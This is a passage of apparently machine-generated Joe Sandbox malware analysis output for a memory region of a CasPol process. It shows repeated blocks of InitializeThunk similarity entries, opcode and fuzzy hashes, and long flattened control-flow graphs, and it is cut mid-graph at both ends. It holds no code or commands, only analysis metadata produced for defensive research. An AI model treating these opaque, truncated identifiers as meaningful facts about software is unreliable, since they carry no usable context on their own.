11721->11418 11722->11418 11723->11418 11724->11422 11725->11422
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: adc997af4959925ff2e1cf542135d57eaca5898a23b2269e205e33a880849459
                                                                                                                      • Instruction ID: 50e11cd94fa3b43211706514cb25508285d6d0a5ebb5ca0ed50f91c17fda3050
                                                                                                                      • Opcode Fuzzy Hash: adc997af4959925ff2e1cf542135d57eaca5898a23b2269e205e33a880849459
                                                                                                                      • Instruction Fuzzy Hash: 33221674A142248FCB699F70C88879DBBB6BF89305F2085EAD60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 11726 200374e5-20037509 call 20036288 call 20036418 12072 20037509 call 1200040 11726->12072 12073 20037509 call 1200014 11726->12073 11732 2003750f-2003754e 12018 2003754e call 12018a7 11732->12018 12019 2003754e call 1201838 11732->12019 12020 2003754e call 1201848 11732->12020 11735 20037554-20037614 12031 20037614 call 1201e00 11735->12031 12032 20037614 call 12023f0 11735->12032 12033 20037614 call 12035d4 11735->12033 12034 20037614 call 12021d8 11735->12034 12035 20037614 call 120200d 11735->12035 12036 20037614 call 120211f 11735->12036 11744 2003761a-200376a4 12041 200376a4 call 1203c70 11744->12041 12042 200376a4 call 1203cd0 11744->12042 11750 200376aa-200376ec 12043 200376ec call 1204420 11750->12043 12044 200376ec call 1204411 11750->12044 12045 200376ec call 12047f7 11750->12045 12046 200376ec call 1204798 11750->12046 11753 200376f2-20037734 12053 20037734 call 12048b8 11753->12053 12054 20037734 call 1204859 11753->12054 11756 2003773a-2003777c 12057 2003777c call 1205955 11756->12057 12058 2003777c call 1205958 11756->12058 11759 20037782-200377da 12064 200377da call 12061a0 11759->12064 12065 200377da call 120605a 11759->12065 12066 200377da call 12061ff 11759->12066 11763 200377e0-2003785e 12070 2003785e call 12065e0 11763->12070 12071 2003785e call 12064e0 11763->12071 11769 20037864-200378dd 12025 200378e3 call 1206ad5 11769->12025 12026 200378e3 call 12069a8 11769->12026 12027 200378e3 call 1206a08 11769->12027 12028 200378e3 call 1206a58 11769->12028 11776 200378e9-2003790b 12029 2003790d call 1206ba0 11776->12029 12030 2003790d call 1206b90 11776->12030 11780 20037913-20037939 12037 2003793b call 1206ba0 11780->12037 12038 2003793b call 1206b90 11780->12038 11784 20037941-20037967 12047 20037969 call 1206ba0 11784->12047 12048 20037969 call 1206b90 11784->12048 11788 2003796f-20037995 12055 20037997 call 1206ba0 11788->12055 12056 20037997 call 1206b90 11788->12056 11792 2003799d-200379c3 12059 200379c5 call 1206ba0 11792->12059 12060 200379c5 call 1206b90 11792->12060 11796 200379cb-20037a37 LdrInitializeThunk 11797 20037d5e 11796->11797 11798 20037a3d-20037a61 11796->11798 12067 20037d5e call 12071c0 11797->12067 12068 20037d5e call 12070c0 11797->12068 12069 20037d5e call 12070d0 11797->12069 11804 20037a67 11798->11804 11805 20037bba-20037bde 11798->11805 11800 20037d64-20037da6 12074 20037da6 call 12071c0 11800->12074 12075 20037da6 call 12070c0 11800->12075 12076 20037da6 call 12070d0 11800->12076 12077 20037da6 call 1207520 11800->12077 12078 20037da6 call 1207620 11800->12078 12079 20037da6 call 12074b6 11800->12079 11804->11805 11806 20037a6d-20037bb5 11804->11806 11814 20037be0 11805->11814 11815 20037be4-20037be6 11805->11815 11806->11797 11807 20037dac-20037e36 12051 20037e36 call 1207c08 11807->12051 12052 20037e36 call 1207c68 11807->12052 11816 20037be2 11814->11816 11817 20037be8 11814->11817 11818 20037bed-20037c17 11815->11818 11816->11815 11817->11818 11826 20037c19 11818->11826 11827 20037c1d-20037c1f 11818->11827 11829 20037c21 11826->11829 11830 20037c1b 11826->11830 11831 20037c26-20037c2c 11827->11831 11829->11831 11830->11827 11831->11797 11833 20037c32-20037d35 11831->11833 11832 20037e3c-20037e7e 12061 20037e7e call 1207d80 11832->12061 12062 20037e7e call 1207e30 11832->12062 12063 20037e7e call 1207e8f 11832->12063 11833->11797 11840 20037e84-20037ec6 12021 20037ec6 call 1207f50 11840->12021 12022 20037ec6 call 1207ef2 11840->12022 11848 20037ecc-20037f56 12049 20037f56 call 12087f8 11848->12049 12050 20037f56 call 1208858 11848->12050 11864 20037f5c-20038038 call 120974c 11887 20038331-20038342 11864->11887 11888 2003803e-20038061 11864->11888 11894 20038348-2003834f 11887->11894 11895 2003869c-200386a3 11887->11895 11903 20038067-20038083 11888->11903 11904 20038319-2003832e 11888->11904 11898 200383e6-200383ed 11894->11898 11899 20038355-20038363 11894->11899 11900 20038725-20038740 11895->11900 11901 200386a9-2003871a 11895->11901 11905 200383f3-20038538 call 20035aa8 call 200356b0 11898->11905 11906 2003855d-20038564 11898->11906 12023 20038369 call 1209d90 11899->12023 12024 20038369 call 1209d81 11899->12024 11901->11900 11922 2003808b-200380d9 11903->11922 11904->11887 11905->11895 11906->11895 11908 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 11906->11908 11908->11895 11921 2003836f-200383a9 12039 200383af call 120b058 11921->12039 12040 200383af call 120afba 11921->12040 11932 20038301-20038313 11922->11932 11933 200380df-200380e6 11922->11933 11932->11903 11932->11904 11936 200381ff-2003822a 11933->11936 11937 200380ec-200381fa 11933->11937 11936->11932 11940 20038230-200382d8 11936->11940 11937->11932 11940->11932 11941 200383b5 11941->11895 12018->11735 12019->11735 12020->11735 12021->11848 12022->11848 12023->11921 12024->11921 12025->11776 12026->11776 12027->11776 12028->11776 12029->11780 12030->11780 12031->11744 12032->11744 12033->11744 12034->11744 12035->11744 12036->11744 12037->11784 12038->11784 12039->11941 12040->11941 12041->11750 12042->11750 12043->11753 12044->11753 12045->11753 12046->11753 12047->11788 12048->11788 12049->11864 12050->11864 12051->11832 12052->11832 12053->11756 12054->11756 12055->11792 12056->11792 12057->11759 12058->11759 12059->11796 12060->11796 12061->11840 12062->11840 12063->11840 12064->11763 12065->11763 12066->11763 12067->11800 12068->11800 12069->11800 12070->11769 12071->11769 12072->11732 12073->11732 12074->11807 12075->11807 12076->11807 12077->11807 12078->11807 12079->11807
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 11732c901dc1917086cb72876c954d0850715c983e2978d0f0999c8ce3822287
                                                                                                                      • Instruction ID: ac17043d5fdb733959d84df92cef12e194718f92c0b327ba19ebfb43414bf0de
                                                                                                                      • Opcode Fuzzy Hash: 11732c901dc1917086cb72876c954d0850715c983e2978d0f0999c8ce3822287
                                                                                                                      • Instruction Fuzzy Hash: 59221774A042248FCB699F70C98879DBBB6BF89305F2085EAD60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 12081 2003752a-2003754e call 20036288 call 20036418 12422 2003754e call 12018a7 12081->12422 12423 2003754e call 1201838 12081->12423 12424 2003754e call 1201848 12081->12424 12087 20037554-20037614 12370 20037614 call 1201e00 12087->12370 12371 20037614 call 12023f0 12087->12371 12372 20037614 call 12035d4 12087->12372 12373 20037614 call 12021d8 12087->12373 12374 20037614 call 120200d 12087->12374 12375 20037614 call 120211f 12087->12375 12096 2003761a-200376a4 12380 200376a4 call 1203c70 12096->12380 12381 200376a4 call 1203cd0 12096->12381 12102 200376aa-200376ec 12386 200376ec call 1204420 12102->12386 12387 200376ec call 1204411 12102->12387 12388 200376ec call 12047f7 12102->12388 12389 200376ec call 1204798 12102->12389 12105 200376f2-20037734 12394 20037734 call 12048b8 12105->12394 12395 20037734 call 1204859 12105->12395 12108 2003773a-2003777c 12398 2003777c call 1205955 12108->12398 12399 2003777c call 1205958 12108->12399 12111 20037782-200377da 12400 200377da call 12061a0 12111->12400 12401 200377da call 120605a 12111->12401 12402 200377da call 12061ff 12111->12402 12115 200377e0-2003785e 12411 2003785e call 12065e0 12115->12411 12412 2003785e call 12064e0 12115->12412 12121 20037864-200378dd 12427 200378e3 call 1206ad5 12121->12427 12428 200378e3 call 12069a8 12121->12428 12429 200378e3 call 1206a08 12121->12429 12430 200378e3 call 1206a58 12121->12430 12128 200378e9-2003790b 12376 2003790d call 1206ba0 12128->12376 12377 2003790d call 1206b90 12128->12377 12132 20037913-20037939 12378 2003793b call 1206ba0 12132->12378 12379 2003793b call 1206b90 12132->12379 12136 20037941-20037967 12390 20037969 call 1206ba0 12136->12390 12391 20037969 call 1206b90 12136->12391 12140 2003796f-20037995 12396 20037997 call 1206ba0 12140->12396 12397 20037997 call 1206b90 12140->12397 12144 2003799d-200379c3 12403 200379c5 call 1206ba0 12144->12403 12404 200379c5 call 1206b90 12144->12404 12148 200379cb-20037a37 LdrInitializeThunk 12149 20037d5e 12148->12149 12150 20037a3d-20037a61 12148->12150 12408 20037d5e call 12071c0 12149->12408 12409 20037d5e call 12070c0 12149->12409 12410 20037d5e call 12070d0 12149->12410 12156 20037a67 12150->12156 12157 20037bba-20037bde 12150->12157 12152 20037d64-20037da6 12416 20037da6 call 12071c0 12152->12416 12417 20037da6 call 12070c0 12152->12417 12418 20037da6 call 12070d0 12152->12418 12419 20037da6 call 1207520 12152->12419 12420 20037da6 call 1207620 12152->12420 12421 20037da6 call 12074b6 12152->12421 12156->12157 12158 20037a6d-20037bb5 12156->12158 12166 20037be0 12157->12166 12167 20037be4-20037be6 12157->12167 12158->12149 12159 20037dac-20037e36 12392 20037e36 call 1207c08 12159->12392 12393 20037e36 call 1207c68 12159->12393 12168 20037be2 12166->12168 12169 20037be8 12166->12169 12170 20037bed-20037c17 12167->12170 12168->12167 12169->12170 12178 20037c19 12170->12178 12179 20037c1d-20037c1f 12170->12179 12181 20037c21 12178->12181 12182 20037c1b 12178->12182 12183 20037c26-20037c2c 12179->12183 12181->12183 12182->12179 12183->12149 12185 20037c32-20037d35 12183->12185 12184 20037e3c-20037e7e 12405 20037e7e call 1207d80 12184->12405 12406 20037e7e call 1207e30 12184->12406 12407 20037e7e call 1207e8f 12184->12407 12185->12149 12192 20037e84-20037ec6 12425 20037ec6 call 1207f50 12192->12425 12426 20037ec6 call 1207ef2 12192->12426 12200 20037ecc-20037f56 12384 20037f56 call 12087f8 12200->12384 12385 20037f56 call 1208858 12200->12385 12216 20037f5c-20038038 call 120974c 12239 20038331-20038342 12216->12239 12240 2003803e-20038061 12216->12240 12246 20038348-2003834f 12239->12246 12247 2003869c-200386a3 12239->12247 12255 20038067-20038083 12240->12255 12256 20038319-2003832e 12240->12256 12250 200383e6-200383ed 12246->12250 12251 20038355-20038363 12246->12251 12252 20038725-20038740 12247->12252 12253 200386a9-2003871a 12247->12253 12257 200383f3-20038538 call 20035aa8 call 200356b0 12250->12257 12258 2003855d-20038564 12250->12258 12414 20038369 call 1209d90 12251->12414 12415 20038369 call 1209d81 12251->12415 12253->12252 12274 2003808b-200380d9 12255->12274 12256->12239 12257->12247 12258->12247 12260 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 12258->12260 12260->12247 12273 2003836f-200383a9 12382 200383af call 120b058 12273->12382 12383 200383af call 120afba 12273->12383 12284 20038301-20038313 12274->12284 12285 200380df-200380e6 12274->12285 12284->12255 12284->12256 12288 200381ff-2003822a 12285->12288 12289 200380ec-200381fa 12285->12289 12288->12284 12292 20038230-200382d8 12288->12292 12289->12284 12292->12284 12293 200383b5 12293->12247 12370->12096 12371->12096 12372->12096 12373->12096 12374->12096 12375->12096 12376->12132 12377->12132 12378->12136 12379->12136 12380->12102 12381->12102 12382->12293 12383->12293 12384->12216 12385->12216 12386->12105 12387->12105 12388->12105 12389->12105 12390->12140 12391->12140 12392->12184 12393->12184 12394->12108 12395->12108 12396->12144 12397->12144 12398->12111 12399->12111 12400->12115 12401->12115 12402->12115 12403->12148 12404->12148 12405->12192 12406->12192 12407->12192 12408->12152 12409->12152 12410->12152 12411->12121 12412->12121 12414->12273 12415->12273 12416->12159 12417->12159 12418->12159 12419->12159 12420->12159 12421->12159 12422->12087 12423->12087 12424->12087 12425->12200 12426->12200 12427->12128 12428->12128 12429->12128 12430->12128
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3e8dfee278dab5a4da30b8aa5f075b78c9889d77c3555e391695d379c6404c17
                                                                                                                      • Instruction ID: f0260f0bb907cf274cf79d91f8ec0736387e20d68593b095af2b701604a7d061
                                                                                                                      • Opcode Fuzzy Hash: 3e8dfee278dab5a4da30b8aa5f075b78c9889d77c3555e391695d379c6404c17
                                                                                                                      • Instruction Fuzzy Hash: EE221774A142248FDB689F70C88879DBBB6BF89305F2085EAD60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 12431 2003756f-20037614 call 20036288 call 20036418 12757 20037614 call 1201e00 12431->12757 12758 20037614 call 12023f0 12431->12758 12759 20037614 call 12035d4 12431->12759 12760 20037614 call 12021d8 12431->12760 12761 20037614 call 120200d 12431->12761 12762 20037614 call 120211f 12431->12762 12443 2003761a-200376a4 12767 200376a4 call 1203c70 12443->12767 12768 200376a4 call 1203cd0 12443->12768 12449 200376aa-200376ec 12769 200376ec call 1204420 12449->12769 12770 200376ec call 1204411 12449->12770 12771 200376ec call 12047f7 12449->12771 12772 200376ec call 1204798 12449->12772 12452 200376f2-20037734 12721 20037734 call 12048b8 12452->12721 12722 20037734 call 1204859 12452->12722 12455 2003773a-2003777c 12725 2003777c call 1205955 12455->12725 12726 2003777c call 1205958 12455->12726 12458 20037782-200377da 12732 200377da call 12061a0 12458->12732 12733 200377da call 120605a 12458->12733 12734 200377da call 12061ff 12458->12734 12462 200377e0-2003785e 12738 2003785e call 12065e0 12462->12738 12739 2003785e call 12064e0 12462->12739 12468 20037864-200378dd 12751 200378e3 call 1206ad5 12468->12751 12752 200378e3 call 12069a8 12468->12752 12753 200378e3 call 1206a08 12468->12753 12754 200378e3 call 1206a58 12468->12754 12475 200378e9-2003790b 12755 2003790d call 1206ba0 12475->12755 12756 2003790d call 1206b90 12475->12756 12479 20037913-20037939 12763 2003793b call 1206ba0 12479->12763 12764 2003793b call 1206b90 12479->12764 12483 20037941-20037967 12773 20037969 call 1206ba0 12483->12773 12774 20037969 call 1206b90 12483->12774 12487 2003796f-20037995 12723 20037997 call 1206ba0 12487->12723 12724 20037997 call 1206b90 12487->12724 12491 2003799d-200379c3 12727 200379c5 call 1206ba0 12491->12727 12728 200379c5 call 1206b90 12491->12728 12495 200379cb-20037a37 LdrInitializeThunk 12496 20037d5e 12495->12496 12497 20037a3d-20037a61 12495->12497 12735 20037d5e call 12071c0 12496->12735 12736 20037d5e call 12070c0 12496->12736 12737 20037d5e call 12070d0 12496->12737 12503 20037a67 12497->12503 12504 20037bba-20037bde 12497->12504 12499 20037d64-20037da6 12740 20037da6 call 12071c0 12499->12740 12741 20037da6 call 12070c0 12499->12741 12742 20037da6 call 12070d0 12499->12742 12743 20037da6 call 1207520 12499->12743 12744 20037da6 call 1207620 12499->12744 12745 20037da6 call 12074b6 12499->12745 12503->12504 12505 20037a6d-20037bb5 12503->12505 12513 20037be0 12504->12513 12514 20037be4-20037be6 12504->12514 12505->12496 12506 20037dac-20037e36 12719 20037e36 call 1207c08 12506->12719 12720 20037e36 call 1207c68 12506->12720 12515 20037be2 12513->12515 12516 20037be8 12513->12516 12517 20037bed-20037c17 12514->12517 12515->12514 12516->12517 12525 20037c19 12517->12525 12526 20037c1d-20037c1f 12517->12526 12528 20037c21 12525->12528 12529 20037c1b 12525->12529 12530 20037c26-20037c2c 12526->12530 12528->12530 12529->12526 12530->12496 12532 20037c32-20037d35 12530->12532 12531 20037e3c-20037e7e 12729 20037e7e call 1207d80 12531->12729 12730 20037e7e call 1207e30 12531->12730 12731 20037e7e call 1207e8f 12531->12731 12532->12496 12539 20037e84-20037ec6 12747 20037ec6 call 1207f50 12539->12747 12748 20037ec6 call 1207ef2 12539->12748 12547 20037ecc-20037f56 12717 20037f56 call 12087f8 12547->12717 12718 20037f56 call 1208858 12547->12718 12563 20037f5c-20038038 call 120974c 12586 20038331-20038342 12563->12586 12587 2003803e-20038061 12563->12587 12593 20038348-2003834f 12586->12593 12594 2003869c-200386a3 12586->12594 12602 20038067-20038083 12587->12602 12603 20038319-2003832e 12587->12603 12597 200383e6-200383ed 12593->12597 12598 20038355-20038363 12593->12598 12599 20038725-20038740 12594->12599 12600 200386a9-2003871a 12594->12600 12604 200383f3-20038538 call 20035aa8 call 200356b0 12597->12604 12605 2003855d-20038564 12597->12605 12749 20038369 call 1209d90 12598->12749 12750 20038369 call 1209d81 12598->12750 12600->12599 12621 2003808b-200380d9 12602->12621 12603->12586 12604->12594 12605->12594 12607 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 12605->12607 12607->12594 12620 2003836f-200383a9 12765 200383af call 120b058 12620->12765 12766 200383af call 120afba 12620->12766 12631 20038301-20038313 12621->12631 12632 200380df-200380e6 12621->12632 12631->12602 12631->12603 12635 200381ff-2003822a 12632->12635 12636 200380ec-200381fa 12632->12636 12635->12631 12639 20038230-200382d8 12635->12639 12636->12631 12639->12631 12640 200383b5 12640->12594 12717->12563 12718->12563 12719->12531 12720->12531 12721->12455 12722->12455 12723->12491 12724->12491 12725->12458 12726->12458 12727->12495 12728->12495 12729->12539 12730->12539 12731->12539 12732->12462 12733->12462 12734->12462 12735->12499 12736->12499 12737->12499 12738->12468 12739->12468 12740->12506 12741->12506 12742->12506 12743->12506 12744->12506 12745->12506 12747->12547 12748->12547 12749->12620 12750->12620 12751->12475 12752->12475 12753->12475 12754->12475 12755->12479 12756->12479 12757->12443 12758->12443 12759->12443 12760->12443 12761->12443 12762->12443 12763->12483 12764->12483 12765->12640 12766->12640 12767->12449 12768->12449 12769->12452 12770->12452 12771->12452 12772->12452 12773->12487 12774->12487
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 53a5565c59231eb2c49fa75bd6313837295f022a8e046288e063ae360ba6189c
                                                                                                                      • Instruction ID: 92432ead216e7e0966a80b25726dc9372c35a74ca2b6ab9468577332338abeef
                                                                                                                      • Opcode Fuzzy Hash: 53a5565c59231eb2c49fa75bd6313837295f022a8e046288e063ae360ba6189c
                                                                                                                      • Instruction Fuzzy Hash: 8B221774A142248FDB689F70C88879DBBB6BF88705F2085EAD60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 12775 200375b4-20037614 call 20036288 call 20036418 13064 20037614 call 1201e00 12775->13064 13065 20037614 call 12023f0 12775->13065 13066 20037614 call 12035d4 12775->13066 13067 20037614 call 12021d8 12775->13067 13068 20037614 call 120200d 12775->13068 13069 20037614 call 120211f 12775->13069 12784 2003761a-200376a4 13074 200376a4 call 1203c70 12784->13074 13075 200376a4 call 1203cd0 12784->13075 12790 200376aa-200376ec 13080 200376ec call 1204420 12790->13080 13081 200376ec call 1204411 12790->13081 13082 200376ec call 12047f7 12790->13082 13083 200376ec call 1204798 12790->13083 12793 200376f2-20037734 13088 20037734 call 12048b8 12793->13088 13089 20037734 call 1204859 12793->13089 12796 2003773a-2003777c 13092 2003777c call 1205955 12796->13092 13093 2003777c call 1205958 12796->13093 12799 20037782-200377da 13094 200377da call 12061a0 12799->13094 13095 200377da call 120605a 12799->13095 13096 200377da call 12061ff 12799->13096 12803 200377e0-2003785e 13105 2003785e call 12065e0 12803->13105 13106 2003785e call 12064e0 12803->13106 12809 20037864-200378dd 13060 200378e3 call 1206ad5 12809->13060 13061 200378e3 call 12069a8 12809->13061 13062 200378e3 call 1206a08 12809->13062 13063 200378e3 call 1206a58 12809->13063 12816 200378e9-2003790b 13070 2003790d call 1206ba0 12816->13070 13071 2003790d call 1206b90 12816->13071 12820 20037913-20037939 13072 2003793b call 1206ba0 12820->13072 13073 2003793b call 1206b90 12820->13073 12824 20037941-20037967 13084 20037969 call 1206ba0 12824->13084 13085 20037969 call 1206b90 12824->13085 12828 2003796f-20037995 13090 20037997 call 1206ba0 12828->13090 13091 20037997 call 1206b90 12828->13091 12832 2003799d-200379c3 13097 200379c5 call 1206ba0 12832->13097 13098 200379c5 call 1206b90 12832->13098 12836 200379cb-20037a37 LdrInitializeThunk 12837 20037d5e 12836->12837 12838 20037a3d-20037a61 12836->12838 13102 20037d5e call 12071c0 12837->13102 13103 20037d5e call 12070c0 12837->13103 13104 20037d5e call 12070d0 12837->13104 12844 20037a67 12838->12844 12845 20037bba-20037bde 12838->12845 12840 20037d64-20037da6 13110 20037da6 call 12071c0 12840->13110 13111 20037da6 call 12070c0 12840->13111 13112 20037da6 call 12070d0 12840->13112 13113 20037da6 call 1207520 12840->13113 13114 20037da6 call 1207620 12840->13114 13115 20037da6 call 12074b6 12840->13115 12844->12845 12846 20037a6d-20037bb5 12844->12846 12854 20037be0 12845->12854 12855 20037be4-20037be6 12845->12855 12846->12837 12847 20037dac-20037e36 13086 20037e36 call 1207c08 12847->13086 13087 20037e36 call 1207c68 12847->13087 12856 20037be2 12854->12856 12857 20037be8 12854->12857 12858 20037bed-20037c17 12855->12858 12856->12855 12857->12858 12866 20037c19 12858->12866 12867 20037c1d-20037c1f 12858->12867 12869 20037c21 12866->12869 12870 20037c1b 12866->12870 12871 20037c26-20037c2c 12867->12871 12869->12871 12870->12867 12871->12837 12873 20037c32-20037d35 12871->12873 12872 20037e3c-20037e7e 13099 20037e7e call 1207d80 12872->13099 13100 20037e7e call 1207e30 12872->13100 13101 20037e7e call 1207e8f 12872->13101 12873->12837 12880 20037e84-20037ec6 13058 20037ec6 call 1207f50 12880->13058 13059 20037ec6 call 1207ef2 12880->13059 12888 20037ecc-20037f56 13078 20037f56 call 12087f8 12888->13078 13079 20037f56 call 1208858 12888->13079 12904 20037f5c-20038038 call 120974c 12927 20038331-20038342 12904->12927 12928 2003803e-20038061 12904->12928 12934 20038348-2003834f 12927->12934 12935 2003869c-200386a3 12927->12935 12943 20038067-20038083 12928->12943 12944 20038319-2003832e 12928->12944 12938 200383e6-200383ed 12934->12938 12939 20038355-20038363 12934->12939 12940 20038725-20038740 12935->12940 12941 200386a9-2003871a 12935->12941 12945 200383f3-20038538 call 20035aa8 call 200356b0 12938->12945 12946 2003855d-20038564 12938->12946 13108 20038369 call 1209d90 12939->13108 13109 20038369 call 1209d81 12939->13109 12941->12940 12962 2003808b-200380d9 12943->12962 12944->12927 12945->12935 12946->12935 12948 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 12946->12948 12948->12935 12961 2003836f-200383a9 13076 200383af call 120b058 12961->13076 13077 200383af call 120afba 12961->13077 12972 20038301-20038313 12962->12972 12973 200380df-200380e6 12962->12973 12972->12943 12972->12944 12976 200381ff-2003822a 12973->12976 12977 200380ec-200381fa 12973->12977 12976->12972 12980 20038230-200382d8 12976->12980 12977->12972 12980->12972 12981 200383b5 12981->12935 13058->12888 13059->12888 13060->12816 13061->12816 13062->12816 13063->12816 13064->12784 13065->12784 13066->12784 13067->12784 13068->12784 13069->12784 13070->12820 13071->12820 13072->12824 13073->12824 13074->12790 13075->12790 13076->12981 13077->12981 13078->12904 13079->12904 13080->12793 13081->12793 13082->12793 13083->12793 13084->12828 13085->12828 13086->12872 13087->12872 13088->12796 13089->12796 13090->12832 13091->12832 13092->12799 13093->12799 13094->12803 13095->12803 13096->12803 13097->12836 13098->12836 13099->12880 13100->12880 13101->12880 13102->12840 13103->12840 13104->12840 13105->12809 13106->12809 13108->12961 13109->12961 13110->12847 13111->12847 13112->12847 13113->12847 13114->12847 13115->12847
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: f6699d3a091e3230d3953380ce09b904649d098872d3c57d9baadc621a53534d
                                                                                                                      • Instruction ID: 1df626510f2d581060be5fed189fc9cc1b31329d7b65e018bfb57133d2c86e27
                                                                                                                      • Opcode Fuzzy Hash: f6699d3a091e3230d3953380ce09b904649d098872d3c57d9baadc621a53534d
                                                                                                                      • Instruction Fuzzy Hash: DF222774A042248FCB689F70C88879DBBB6BF89705F2085EAD60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 13116 200375f9-20037614 call 20036288 call 20036418 13398 20037614 call 1201e00 13116->13398 13399 20037614 call 12023f0 13116->13399 13400 20037614 call 12035d4 13116->13400 13401 20037614 call 12021d8 13116->13401 13402 20037614 call 120200d 13116->13402 13403 20037614 call 120211f 13116->13403 13122 2003761a-200376a4 13408 200376a4 call 1203c70 13122->13408 13409 200376a4 call 1203cd0 13122->13409 13128 200376aa-200376ec 13410 200376ec call 1204420 13128->13410 13411 200376ec call 1204411 13128->13411 13412 200376ec call 12047f7 13128->13412 13413 200376ec call 1204798 13128->13413 13131 200376f2-20037734 13420 20037734 call 12048b8 13131->13420 13421 20037734 call 1204859 13131->13421 13134 2003773a-2003777c 13424 2003777c call 1205955 13134->13424 13425 2003777c call 1205958 13134->13425 13137 20037782-200377da 13431 200377da call 12061a0 13137->13431 13432 200377da call 120605a 13137->13432 13433 200377da call 12061ff 13137->13433 13141 200377e0-2003785e 13437 2003785e call 12065e0 13141->13437 13438 2003785e call 12064e0 13141->13438 13147 20037864-200378dd 13450 200378e3 call 1206ad5 13147->13450 13451 200378e3 call 12069a8 13147->13451 13452 200378e3 call 1206a08 13147->13452 13453 200378e3 call 1206a58 13147->13453 13154 200378e9-2003790b 13396 2003790d call 1206ba0 13154->13396 13397 2003790d call 1206b90 13154->13397 13158 20037913-20037939 13404 2003793b call 1206ba0 13158->13404 13405 2003793b call 1206b90 13158->13405 13162 20037941-20037967 13414 20037969 call 1206ba0 13162->13414 13415 20037969 call 1206b90 13162->13415 13166 2003796f-20037995 13422 20037997 call 1206ba0 13166->13422 13423 20037997 call 1206b90 13166->13423 13170 2003799d-200379c3 13426 200379c5 call 1206ba0 13170->13426 13427 200379c5 call 1206b90 13170->13427 13174 200379cb-20037a37 LdrInitializeThunk 13175 20037d5e 13174->13175 13176 20037a3d-20037a61 13174->13176 13434 20037d5e call 12071c0 13175->13434 13435 20037d5e call 12070c0 13175->13435 13436 20037d5e call 12070d0 13175->13436 13182 20037a67 13176->13182 13183 20037bba-20037bde 13176->13183 13178 20037d64-20037da6 13439 20037da6 call 12071c0 13178->13439 13440 20037da6 call 12070c0 13178->13440 13441 20037da6 call 12070d0 13178->13441 13442 20037da6 call 1207520 13178->13442 13443 20037da6 call 1207620 13178->13443 13444 20037da6 call 12074b6 13178->13444 13182->13183 13184 20037a6d-20037bb5 13182->13184 13192 20037be0 13183->13192 13193 20037be4-20037be6 13183->13193 13184->13175 13185 20037dac-20037e36 13418 20037e36 call 1207c08 13185->13418 13419 20037e36 call 1207c68 13185->13419 13194 20037be2 13192->13194 13195 20037be8 13192->13195 13196 20037bed-20037c17 13193->13196 13194->13193 13195->13196 13204 20037c19 13196->13204 13205 20037c1d-20037c1f 13196->13205 13207 20037c21 13204->13207 13208 20037c1b 13204->13208 13209 20037c26-20037c2c 13205->13209 13207->13209 13208->13205 13209->13175 13211 20037c32-20037d35 13209->13211 13210 20037e3c-20037e7e 13428 20037e7e call 1207d80 13210->13428 13429 20037e7e call 1207e30 13210->13429 13430 20037e7e call 1207e8f 13210->13430 13211->13175 13218 20037e84-20037ec6 13446 